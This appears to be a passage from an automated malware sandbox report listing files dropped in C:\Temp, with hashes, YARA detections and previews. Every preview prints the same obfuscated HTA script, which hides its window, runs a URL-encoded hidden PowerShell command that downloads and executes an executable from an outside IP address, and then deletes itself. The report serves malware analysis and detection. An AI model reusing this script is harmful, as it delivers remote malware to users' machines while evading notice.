SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	false
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\A9Dfw7SLp.gif (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	false
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\A9Dfw7SLp.txt

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\A9Dfw7SLp.txt, Author: Joe Security
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\CAvWBYtqI.gif (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	false
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\CAvWBYtqI.txt

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\CAvWBYtqI.txt, Author: Joe Security
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\CucWPjLzJ.gif (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	false
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\CucWPjLzJ.txt

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\CucWPjLzJ.txt, Author: Joe Security
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\WkYLwajB0.gif (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	false
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\WkYLwajB0.txt

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\WkYLwajB0.txt, Author: Joe Security
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\erFIq31tw.gif (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	false
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\erFIq31tw.txt

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\erFIq31tw.txt, Author: Joe Security
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\random.hta

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\random.hta, Author: Joe Security
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\w9dhIoFqs.gif (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	false
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\w9dhIoFqs.txt

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\w9dhIoFqs.txt, Author: Joe Security
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

